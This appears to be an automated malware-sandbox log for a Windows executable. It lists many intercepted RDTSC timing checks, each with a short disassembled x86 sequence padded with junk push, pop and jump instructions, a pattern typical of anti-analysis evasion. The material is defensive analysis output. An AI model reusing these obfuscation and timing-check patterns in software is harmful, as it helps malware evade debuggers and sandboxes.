Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB6744 second address: CB6751 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB69EB second address: CB6A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6A1AF second address: C6A24D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5FC0CE52C8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D24BEh], edx 0x0000002a push 00000004h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F5FC0CE52C8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 jmp 00007F5FC0CE52CCh 0x0000004b mov di, BFDBh 0x0000004f nop 0x00000050 jnp 00007F5FC0CE52E1h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F5FC0CE52CDh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C6A24D second address: C6A252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB782F second address: CB7843 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5FC0CE52C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5FC0CE52C6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB7843 second address: CB784D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5FC0E77A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB784D second address: CB7853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB7853 second address: CB7859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CB7859 second address: CB785D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CBA9FC second address: CBAA01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CBA377 second address: CBA384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5FC0CE52C6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CBA384 second address: CBA38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CC1967 second address: CC196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CC196C second address: CC1978 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5FC0E77A0Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CC1C05 second address: CC1C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CC24F1 second address: CC250C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5FC0E77A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F5FC0E77A0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CC250C second address: CC2516 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5FC0CE52C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CC2516 second address: CC251F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CC251F second address: CC2527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CC773B second address: CC775B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F5FC0E77A06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F5FC0E77A11h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CCA4E7 second address: CCA532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CFh 0x00000007 jl 00007F5FC0CE52DCh 0x0000000d jmp 00007F5FC0CE52D6h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5FC0CE52D9h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CCA91B second address: CCA91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CCAAC4 second address: CCAAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CCAD43 second address: CCAD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CCAD49 second address: CCAD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CCAD4D second address: CCAD6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5FC0E77A18h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CCAEC1 second address: CCAEFF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop eax 0x0000000a jnc 00007F5FC0CE52DDh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5FC0CE52D0h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CCAEFF second address: CCAF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CCAF05 second address: CCAF0D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CCAF0D second address: CCAF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD17D4 second address: CD17D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD195B second address: CD1969 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD1969 second address: CD196D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD196D second address: CD1971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD1971 second address: CD1977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD2405 second address: CD2416 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD2416 second address: CD241C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD241C second address: CD2428 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5FC0E77A0Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD269E second address: CD26A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD345A second address: CD345E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD345E second address: CD3464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD3464 second address: CD3481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A17h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD3481 second address: CD3485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD3485 second address: CD349D instructions: 0x00000000 rdtsc 0x00000002 je 00007F5FC0E77A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F5FC0E77A0Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD1331 second address: CD1337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CD1337 second address: CD135E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5FC0E77A14h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CDC04D second address: CDC051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CDC051 second address: CDC059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CDC059 second address: CDC064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5FC0CE52C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CDD618 second address: CDD61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CDFA60 second address: CDFA66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CDFA66 second address: CDFA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CDFA6C second address: CDFA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CDFA70 second address: CDFA9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5FC0E77A10h 0x00000010 jmp 00007F5FC0E77A0Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CEA5EF second address: CEA618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5FC0CE52C6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F5FC0CE52CFh 0x00000016 pushad 0x00000017 jg 00007F5FC0CE52C6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CEA19B second address: CEA1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CEA1A1 second address: CEA1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF0CC7 second address: CF0CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF0CCB second address: CF0CE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF0CE3 second address: CF0CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF0CE9 second address: CF0CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF06A4 second address: CF06AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF06AA second address: CF06B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF06B0 second address: CF070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F5FC0E77A06h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jo 00007F5FC0E77A08h 0x0000001e pushad 0x0000001f popad 0x00000020 push ecx 0x00000021 push edi 0x00000022 pop edi 0x00000023 pop ecx 0x00000024 jmp 00007F5FC0E77A19h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5FC0E77A0Bh 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF070C second address: CF0710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF0888 second address: CF088D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF52DD second address: CF52E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF52E3 second address: CF52E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: CF52E8 second address: CF52EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D089E2 second address: D089F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D089F1 second address: D08A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52D6h 0x00000009 jo 00007F5FC0CE52C6h 0x0000000f popad 0x00000010 jmp 00007F5FC0CE52D9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D072A4 second address: D072AE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5FC0E77A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D07422 second address: D07431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jl 00007F5FC0CE52C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D07866 second address: D07870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D079B2 second address: D079B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D07CD1 second address: D07CF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D07CF5 second address: D07CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D07CF9 second address: D07D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D07D09 second address: D07D2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D0h 0x00000007 pushad 0x00000008 ja 00007F5FC0CE52C6h 0x0000000e jno 00007F5FC0CE52C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D0DA98 second address: D0DAA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D0DAA2 second address: D0DAC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F5FC0CE52C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D0DAC0 second address: D0DAD1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5FC0E77A06h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D0DAD1 second address: D0DAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D0DC2D second address: D0DC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D5183A second address: D51842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D51842 second address: D51848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D52EF1 second address: D52EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5FC0CE52C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D52EFB second address: D52EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D52EFF second address: D52F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D553FA second address: D55413 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5FC0E77A13h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D61B4E second address: D61B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D61B52 second address: D61B66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D61B66 second address: D61B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D61B7A second address: D61B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D61B7E second address: D61BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5FC0CE52D7h 0x00000010 jp 00007F5FC0CE52C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D6167E second address: D6168D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F5FC0E77A06h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D6168D second address: D616B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D6h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F5FC0CE52C6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
